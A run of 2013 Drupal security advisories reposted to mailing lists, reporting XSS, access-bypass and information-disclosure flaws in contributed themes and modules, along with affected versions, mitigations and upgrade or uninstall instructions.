[Full-disclosure] [Security-news] SA-CONTRIB-2013-031 - Premium Responsive theme - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1929508 * Advisory ID: DRUPAL-SA-CONTRIB-2013-031 * Project: Premium Responsive [1] (third-party theme) * Version: 7.x * Date: 2013-February-27 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This third-party contributed theme change Drupal's interface. The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage leading to a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Premium Responsive versions prior to 7.x-1.6 Drupal core is not affected. If you do not use the contributed Premium Responsive [4] theme, there is nothing you need to do. SOLUTION Install the latest version: * Premium Responsive 7.x-1.6 [5] Also see the Premium Responsive [6] project page. REPORTED BY - * Greg Knaddison [7] of the Drupal Security Team FIXED BY * saran.quardz [8] the theme maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/responsive [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/responsive [5] http://drupal.org/node/1730752 [6] http://drupal.org/project/responsive [7] http://drupal.org/user/36762 [8] http://drupal.org/user/1031208 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/91990 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-030 - Clean Theme - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1929500 * Advisory ID: DRUPAL-SA-CONTRIB-2013-030 * Project: Clean Theme [1] (third-party theme) * Version: 7.x * Date: 2013-February-27 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This third-party contributed theme change Drupal's interface. The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage leading to a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Clean Theme versions prior to 7.x-1.3 Drupal core is not affected. If you do not use the contributed Clean Theme [4] theme, there is nothing you need to do. SOLUTION Install the latest version: * Clean Theme 7.x-1.3 [5] Also see the Clean Theme [6] project page. REPORTED BY - * Greg Knaddison [7] of the Drupal Security Team FIXED BY * saran.quardz [8] the theme maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/clean_theme [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/clean_theme [5] http://drupal.org/node/1723532 [6] http://drupal.org/project/clean_theme [7] http://drupal.org/user/36762 [8] http://drupal.org/user/1031208 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/91990 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-032 - Company theme - Cross Site Scripting (XSS)
View online: https://drupal.org/node/1929512 * Advisory ID: DRUPAL-SA-CONTRIB-2013-032 * Project: Company theme [1] (third-party theme) * Version: 7.x * Date: 2013-February-27 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This third-party contributed theme change Drupal's interface. The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage leading to a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Company Theme versions prior to 7.x-1.4 Drupal core is not affected. If you do not use the contributed Company theme [4] theme, there is nothing you need to do. SOLUTION Install the latest version: * Company Theme 7.x-1.4 [5] Also see the Company theme [6] project page. REPORTED BY - * Greg Knaddison [7] of the Drupal Security Team FIXED BY * saran.quardz [8] the theme maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/company [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/company [5] http://drupal.org/node/1724232 [6] http://drupal.org/project/company [7] http://drupal.org/user/36762 [8] http://drupal.org/user/1031208 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/91990 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-027 - Professional theme - Cross Site Scripting (XSS)
View online: https://drupal.org/node/1929486 * Advisory ID: DRUPAL-SA-CONTRIB-2013-015 * Project: Professional [1] (third-party theme) * Version: 7.x * Date: 2013-February-06 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This third-party contributed theme change Drupal's interface. The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage leading to a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Professional Theme versions prior to 7.x-1.4 Drupal core is not affected. If you do not use the contributed Professional [4] theme, there is nothing you need to do. SOLUTION Install the latest version: * Professional Theme 7.x-1.4 [5] Also see the Professional [6] project page. REPORTED BY - * Greg Knaddison [7] of the Drupal Security Team FIXED BY * saran.quardz [8] the theme maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/professional_theme [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/professional_theme [5] http://drupal.org/node/1730768 [6] http://drupal.org/project/professional_theme [7] http://drupal.org/user/36762 [8] http://drupal.org/user/1031208 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/91990 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-025 - Fresh Theme - Cross Site Scripting (XSS)
View online: https://drupal.org/node/1929482 * Advisory ID: DRUPAL-SA-CONTRIB-2013-025 * Project: Fresh theme [1] (third-party theme) * Version: 7.x * Date: 2013-February-27 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This third-party contributed theme change Drupal's interface. The theme doesn't properly sanitize user-entered content in the 3 slide gallery on the homepage leading to a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Fresh Theme versions prior to 7.x-1.4 Drupal core is not affected. If you do not use the contributed Fresh Theme [4], there is nothing you need to do. SOLUTION Install the latest version: * Fresh Theme 7.x-1.4 [5] Also see the Fresh Theme [6] project page. REPORTED BY - * Greg Knaddison [7] of the Drupal Security Team FIXED BY * saran.quardz [8] the theme maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/fresh [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/fresh [5] http://drupal.org/node/1723316 [6] http://drupal.org/project/fresh [7] http://drupal.org/user/36762 [8] http://drupal.org/user/1031208 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/91990 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-026 - Best Responsive Theme - Cross Site Scripting (XSS)
View online: https://drupal.org/node/1929484 * Advisory ID: DRUPAL-SA-CONTRIB-2013-026 * Project: Best Responsive [1] (third-party theme) * Version: 7.x * Date: 2013-February-27 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Best Responsive theme is a light weight Drupal 7 theme with a modern look and feel. The theme doesn't properly sanitize user-entered content in the social icon leading to a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Best Responsive Theme 7.x-1.x versions prior to 7.x-1.1. Drupal core is not affected. If you do not use the contributed Best Responsive [4] theme, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Best responsive Theme for Drupal 7.x, upgrade to Best responsive Theme 7.x-1.1 [5] Also see the Best Responsive [6] project page. REPORTED BY - * Greg Knaddison [7] of the Drupal Security Team FIXED BY * saran.quardz [8] the theme maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/best_responsive [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/best_responsive [5] http://drupal.org/node/1929390 [6] http://drupal.org/project/best_responsive [7] http://drupal.org/user/36762 [8] http://drupal.org/user/1031208 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/91990 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-024 - Creative Theme - Cross Site Scripting (XSS)
View online: https://drupal.org/node/1929474 * Advisory ID: DRUPAL-SA-CONTRIB-2013-024 * Project: Creative Theme [1] (third-party theme) * Version: 7.x * Date: 2013-February-27 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Creative Theme is a light weight Drupal 7 theme with a modern look and feel. The theme doesn't properly sanitize user-entered content in the social icon leading to a Cross Site Scripting (XSS) vulnerability. This vulnerability is mitigated by the fact that an attacker would have to have the 'administer themes' permission. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Creative Theme 7.x-1.x versions prior to 7.x-1.2. Drupal core is not affected. If you do not use the contributed Creative Theme [4], there is nothing you need to do. SOLUTION Install the latest version: * If you use the Creative Theme for Drupal 7.x, upgrade to Creative Theme 7.x-1.2 [5] Also see the Creative Theme [6] project page. REPORTED BY - * Greg Knaddison [7] of the Drupal Security Team FIXED BY * saran.quardz [8] the theme maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/creative [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/creative [5] http://drupal.org/node/1929380 [6] http://drupal.org/project/creative [7] http://drupal.org/user/36762 [8] http://drupal.org/user/1031208 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/91990 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-015 - Manager Change for Organic Groups - Cross site scripting (XSS)
View online: http://drupal.org/node/1916312 * Advisory ID: DRUPAL-SA-CONTRIB-2013-015 * Project: Manager Change for Organic Groups [1] (third-party module) * Version: 7.x * Date: 2013-February-13 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module extends Organic Groups to allow the manager of a group to select a new manager for their group (ie if they want to leave the group). The autocomplete field for selecting a new manager didn't properly filter usernames. The vulnerability is mitigated by the fact that Drupal's default registration validation prevents the creation of username that contain cross site scripting attacks. However, a contributed module may bypass that validation or alter the way usernames are loaded in a way that introduces an attack vector. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Manager Change for Organic Groups 7.x-2.x versions prior to 7.x-2.1. Drupal core is not affected. If you do not use the contributed module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the 2.x branch of the Manager Change for Organic Groups module for Drupal 7.x, upgrade to Manager Change for Organic Groups 7.x-2.1 [4] Also see the Manager Change for Organic Groups project page. REPORTED BY - * Michael Hess [5] of the Drupal Security Team FIXED BY * Joe Haskins [6] the module maintainer COORDINATED BY -- * Michael Hess [7] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11]. [1] http://drupal.org/project/og_manager_change [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/node/1915408 [5] http://drupal.org/user/102818 [6] http://drupal.org/user/1358434 [7] http://drupal.org/user/102818 [8] http://drupal.org/contact [9] http://drupal.org/security-team [10] http://drupal.org/writing-secure-code [11] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-016 - Banckle Chat - Access bypass - Unsupported
View online: http://drupal.org/node/1916370 * Advisory ID: DRUPAL-SA-CONTRIB-2013-016 * Project: Banckle Chat [1] (third-party module) * Version: 7.x * Date: 2013-February-13 * Security risk: Highly critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module enables you to chat with the visitors of your web site. The module doesn't sufficiently check access to its admin pages. This vulnerability is not mitigated. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * All Banckle Chat 7.x-1.x versions. Drupal core is not affected. If you do not use the contributed Banckle Chat [4] module, there is nothing you need to do. SOLUTION Uninstall the module. Also see the Banckle Chat [5] project page. REPORTED BY - * Wale Adesanya [6] * Lau Futtrup Rasmussen FIXED BY Not applicable. COORDINATED BY -- * Gerhard Killesreiter [7] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11]. [1] http://drupal.org/project/banckle_live_chat [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/banckle_live_chat [5] http://drupal.org/project/banckle_live_chat [6] http://drupal.org/user/1028156 [7] http://drupal.org/user/83 [8] http://drupal.org/contact [9] http://drupal.org/security-team [10] http://drupal.org/writing-secure-code [11] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-012 - Google Authenticator login - Access Bypass
View online: http://drupal.org/node/1903282 * Advisory ID: DRUPAL-SA-CONTRIB-2013-012 * Project: Google Authenticator login [1] (third-party module) * Version: 7.x * Date: 2013-January-30 * Security risk: Highly critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module will allow you to add Time-based One-time Password Algorithm (also called "Two Step Authentication" or "Multi-Factor Authentication") support to user logins. Users with the permission to use multi-factor authentication need to associate a Google Authenticator token with their acount before they can use the multi-factor authentication for login. If this step is not done or not completed, their accounts can be logged-in to by supplying the username only due to a logic bug in the module's validation. This means that when an administrator enables the module and grants the permission to use multi-factor authentication all user accounts with that permission can be logged-in to via the username. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * All 7.x versions prior to 7.x-1.3. Drupal core is not affected. If you do not use the contributed Google Authenticator login [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Google Authenticator login module for Drupal 7.x, upgrade to Google Authenticator login 7.x-1.3 [5] Also see the Google Authenticator login [6] project page. REPORTED BY - * Patrick C. [7] FIXED BY * attiks [8] the module maintainer COORDINATED BY -- * Heine Deelstra [9] of the Drupal Security Team * Greg Knaddison [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/ga_login [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/ga_login [5] http://drupal.org/node/1902102 [6] http://drupal.org/project/ga_login [7] https://drupal.org/user/127758 [8] http://drupal.org/user/105002 [9] http://drupal.org/user/17943 [10] http://drupal.org/user/36762 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-013 - Boxes - Cross site scripting (XSS)
View online: http://drupal.org/node/1903300 * Advisory ID: DRUPAL-SA-CONTRIB-2013-013 * Project: Boxes [1] (third-party module) * Version: 7.x * Date: 2013-January-30 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The subject field for the included simple box doesn't escape HTML properly. This vulnerability is mitigated by the fact that an attacker must have a role with the permission to administer/edit boxes. Wikipedia has more information about cross site scripting [3] (XSS). CVE IDENTIFIER(S) ISSUED * /A CVE identifier [4] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Boxes 7.x-1.x versions prior to 7.x-1.1 Drupal core is not affected. If you do not use the contributed Boxes [5] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Boxes module for Drupal 7.x, upgrade to Boxes 7.x-1.1 [6] Also see the Boxes [7] project page. REPORTED BY - * Laura Dickinson [8] FIXED BY * Tirdad Chaharlengi [9] the module maintainer COORDINATED BY -- * Greg Knaddison [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/boxes [2] http://drupal.org/security-team/risk-levels [3] http://en.wikipedia.org/wiki/Xss [4] http://cve.mitre.org/ [5] http://drupal.org/project/boxes [6] http://drupal.org/node/1897016 [7] http://drupal.org/project/boxes [8] http://drupal.org/user/337318 [9] http://drupal.org/user/383630 [10] http://drupal.org/user/36762 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-014 - Drush Debian Packaging - Information Disclosure - Unsupported
View online: http://drupal.org/node/1903324 * Advisory ID: DRUPAL-SA-CONTRIB-2013-014 * Project: Drush Debian Packaging [1] (third-party module) * Version: 7.x * Date: 2013-January-30 * Security risk: Critical [2] * Exploitable from: Local * Vulnerability: Information Disclosure DESCRIPTION - This package is a tool to build debian packages from a Drupal instance. The module doesn't sufficiently protect database credentials. This vulnerability is mitigated by the fact that an attacker must have shell access to the server. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * All versions. Drupal core is not affected. If you do not use the contributed Drush Debian Packaging [4] module, there is nothing you need to do. SOLUTION Uninstall the package. Also see the Drush Debian Packaging [5] project page. REPORTED BY - * jiri-catalyst [6] FIXED BY Not applicable. COORDINATED BY -- * Greg Knaddison [7] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11]. [1] http://drupal.org/project/debuild [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/debuild [5] http://drupal.org/project/debuild [6] http://drupal.org/user/2322458 [7] http://drupal.org/user/36762 [8] http://drupal.org/contact [9] http://drupal.org/security-team [10] http://drupal.org/writing-secure-code [11] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-011 - email2image - Access Bypass - Unsupported
View online: http://drupal.org/node/1903264 * Advisory ID: DRUPAL-SA-CONTRIB-2013-011 * Project: email2image [1] (third-party module) * Version: 6.x * Date: 2013-January-30 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module creates images of user email addresses and email fields. The module doesn't sufficiently check node access restrictions when displaying such fields. This vulnerability is mitigated by the fact that it only impacts sites using node access. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * All email2image 6.x-1.x and 6.x-2.x versions. Drupal core is not affected. If you do not use the contributed email2image [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the email2image module for Drupal 6.x you should uninstall the module Also see the email2image [5] project page. REPORTED BY - * Ayesh Karunaratne [6] FIXED BY Not applicable. COORDINATED BY -- * Lee Rowlands [7] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11]. [1] http://drupal.org/project/email2image [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/email2image [5] http://drupal.org/project/email2image [6] http://drupal.org/user/796148 [7] http://drupal.org/user/395439 [8] http://drupal.org/contact [9] http://drupal.org/security-team [10] http://drupal.org/writing-secure-code [11] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-010 - Search API sorts - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1896782 * Advisory ID: DRUPAL-SA-CONTRIB-2013-010 * Project: Search API sorts [1] (third-party module) * Version: 7.x * Date: 2013-January-23 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module enables you to sort by Search API facets. The module doesn't sufficiently filter user entered text in field labels. This vulnerability is mitigated by the fact that an attacker must have a role with the ability to modify field labels such as "administer taxonomy". CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Search API Sorts 7.x-1.x versions prior to 7.x-1.4. Drupal core is not affected. If you do not use the contributed Search API sorts [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Search API Sorts module for Drupal 7.x, upgrade to Search API Sorts 7.x-1.4 [5] Also see the Search API sorts [6] project page. REPORTED BY - * Francisco José Cruz Romanos [7] FIXED BY * Francisco José Cruz Romanos [8] COORDINATED BY -- * Klaus Purer [9] of the Drupal Security Team * Greg Knaddison [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/1097626 [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/1097626 [5] http://drupal.org/node/1896756 [6] http://drupal.org/project/1097626 [7] https://drupal.org/user/848238 [8] https://drupal.org/user/848238 [9] http://drupal.org/user/262198 [10] http://drupal.org/user/36762 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-009 - Keyboard Shortcut Utility - Access Bypass - module unsupported
View online: http://drupal.org/node/1896752 * Advisory ID: DRUPAL-SA-CONTRIB-2013-009 * Project: Keyboard Shortcut Utility [1] (third-party module) * Version: 7.x * Date: 2013-January-23 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - The Keyboard Shortcut Utility module enables you to create keyboard shortcuts on your website. You can create a shortcut to go to a page (internal or external) or call a JavaScript function. The module doesn't sufficiently check node access to view nodes for users who have "view shortcuts" permission. It also doesn't check node access to view, edit, or delete nodes for users who have the "admin shortcuts" permission. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "view shortcuts" or "admin shortcuts". CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * All Keyboard Shortcut Utility 7.x-1.x versions. Drupal core is not affected. If you do not use the contributed Keyboard Shortcut Utility [4] module, there is nothing you need to do. SOLUTION Uninstall the module. No patched version is available. Also see the Keyboard Shortcut Utility [5] project page. REPORTED BY - * Michael Griego [6] FIXED BY Not applicable. COORDINATED BY -- * Ivo Van Geertruyen [7] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at 